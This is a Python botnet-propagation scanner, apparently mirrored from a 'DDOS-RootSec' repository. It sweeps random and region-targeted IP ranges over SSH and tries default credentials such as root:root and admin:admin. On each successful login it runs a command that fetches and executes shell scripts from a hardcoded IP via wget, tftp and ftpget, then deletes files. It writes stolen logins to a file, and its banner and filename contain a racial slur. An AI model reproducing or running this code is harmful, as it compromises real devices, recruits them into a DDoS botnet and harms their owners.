Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Scanning/AUTOSCANNER/Scan_2.py
5038 views
1
#!/usr/bin/env python
2
# -*- coding: utf-8 -*-
3
import threading, paramiko, random, socket, time, sys
4
5
paramiko.util.log_to_file("/dev/null")
6
7
cmd='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.180.133.200/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 199.180.133.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 199.180.133.200; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 199.180.133.200 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
8
9
#cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://199.180.133.200/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 198.167.140.22 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 199.180.133.200; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 199.180.133.200 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
10
#cmd='cd /tmp; rm -rf *; wget -q http://199.180.133.200/Bots/Bots.sh; sh Bots.sh; rm -rf Bots.sh'
11
blacklist = [
12
'127'
13
]
14
15
passwords = [
16
"admin:admin"
17
]
18
19
if sys.argv[4] == '1':
20
passwords = ["root:root"]
21
if sys.argv[4] == '2':
22
passwords = ["guest:guest"]
23
if sys.argv[4] == '3':
24
passwords = ["admin:1234"]
25
if sys.argv[4] == '4':
26
passwords = ["admin:admin"]
27
28
ascii = '\x1b[1;36m'
29
ascii +=' ¦¦¦¦¦¦¦+ ¦¦¦¦¦¦+ ¦¦¦¦¦+ ¦¦¦+ ¦¦+ \r\n'#
30
ascii +=' ¦¦+----+¦¦+----+¦¦+--¦¦+¦¦¦¦+ ¦¦¦ \r\n'#
31
ascii +=' ¦¦¦¦¦¦¦+¦¦¦ ¦¦¦¦¦¦¦¦¦¦+¦¦+ ¦¦¦ \r\n'#
32
ascii +=' +----¦¦¦¦¦¦ ¦¦+--¦¦¦¦¦¦+¦¦+¦¦¦ \r\n'#
33
ascii +=' ¦¦¦¦¦¦¦¦+¦¦¦¦¦¦+¦¦¦ ¦¦¦¦¦¦ +¦¦¦¦¦ \r\n'#
34
ascii +=' +------+ +-----++-+ +-++-+ +---+ \r\n'#
35
ascii +=' ~ [ Scan Shit Nigga ] ~ \r\n'#
36
ascii +=' ~ Migrating Net ~ \r\n'#
37
ascii +='\x1b[36m'##############################################################################
38
#BANNER IDEA FROM ZONE HAX
39
print ''
40
print ''
41
print ''
42
print ''
43
print ''
44
print ''
45
print ''
46
print ''
47
print ''
48
print ''
49
print ''
50
print ''
51
print ''
52
print ''
53
print ''
54
print ''
55
print ''
56
print ''
57
print ''
58
print ''
59
print ''
60
print ''
61
print ''
62
print ''
63
print ''
64
print ''
65
print ''
66
print ''
67
print ''
68
print ''
69
print ''
70
print ''
71
print ''
72
print ''
73
print ''
74
print ''
75
print ''
76
print ''
77
print ''
78
print ''
79
print ''
80
print ''
81
print ''
82
print ''
83
print ''
84
print ''
85
print ''
86
print ''
87
print ascii
88
print '\x1b[36m *Make Sure You Changed The ulimit*\x1b[0m'
89
print ''
90
print '\x1b[36m Usage: python file.py 500 Type Pass\x1b[0m'
91
print '\x1b[36m Type: LUCKY, LUCKY2, A or B\x1b[0m'
92
print '\x1b[36m Pass: 1, 2, 3, perl, all\x1b[0m'
93
print '\x1b[36m Scanner Started\x1b[0m'
94
print '\x1b[36m Migrating Runz Shit\x1b[0m'
95
print ''
96
print ''
97
98
ipclassinfo = sys.argv[2]
99
if ipclassinfo == "A":
100
ip1 = sys.argv[3]
101
elif ipclassinfo == "B":
102
ip1 = sys.argv[3].split(".")[0]
103
ip2 = sys.argv[3].split(".")[1]
104
elif ipclassinfo == "C":
105
ips = sys.argv[3].split(".")
106
num=0
107
for ip in ips:
108
num=num+1
109
if num == 1:
110
ip1 = ip
111
elif num == 2:
112
ip2 = ip
113
elif num == 3:
114
ip3 = ip
115
class sshscanner(threading.Thread):
116
global passwords
117
global ipclassinfo
118
if ipclassinfo == "A":
119
global ip1
120
elif ipclassinfo == "B":
121
global ip1
122
global ip2
123
elif ipclassinfo == "C":
124
global ip1
125
global ip2
126
global ip3
127
def run(self):
128
while 1:
129
try:
130
while 1:
131
thisipisbad='no'
132
if ipclassinfo == "A":
133
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
134
elif ipclassinfo == "B":
135
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
136
elif ipclassinfo == "C":
137
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
138
elif ipclassinfo == "BRAZIL":
139
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
140
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
141
elif ipclassinfo == "ER":
142
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
143
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
144
elif ipclassinfo == "LUCKY":
145
lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24"]
146
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
147
elif ipclassinfo == "LUCKY2":
148
lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105" ]
149
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
150
elif ipclassinfo == "LUCKY3":
151
lucky2 = [ "103.20","103.30","103.47","103.57" ]
152
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
153
elif ipclassinfo == "RAND":
154
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
155
elif ipclassinfo == "INTERNET":
156
lol = ["1"]
157
self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
158
else:
159
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
160
for badip in blacklist:
161
if badip in self.host:
162
thisipisbad='yes'
163
if thisipisbad=='no':
164
break
165
username='root'
166
password=""
167
port = 22
168
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
169
s.settimeout(3)
170
s.connect((self.host, port))
171
s.close()
172
ssh = paramiko.SSHClient()
173
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
174
dobreak=False
175
for passwd in passwords:
176
if ":n/a" in passwd:
177
password=""
178
else:
179
password=passwd.split(":")[1]
180
if "n/a:" in passwd:
181
username=""
182
else:
183
username=passwd.split(":")[0]
184
try:
185
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
186
dobreak=True
187
break
188
except:
189
pass
190
if True == dobreak:
191
break
192
badserver=True
193
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
194
output = stdout.read()
195
if "inet addr" in output:
196
badserver=False
197
if badserver == False:
198
print '\x1b[36mBot(s) From Migrating Net Found: \x1b[37m'+self.host+'|'+username+'|'+password
199
ssh.exec_command(""+cmd+"")
200
scanned = open("nigga.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
201
time.sleep(15)
202
ssh.close()
203
except:
204
pass
205
206
for x in range(0,1500):
207
try:
208
t = sshscanner()
209
t.start()
210
except:
211
pass
212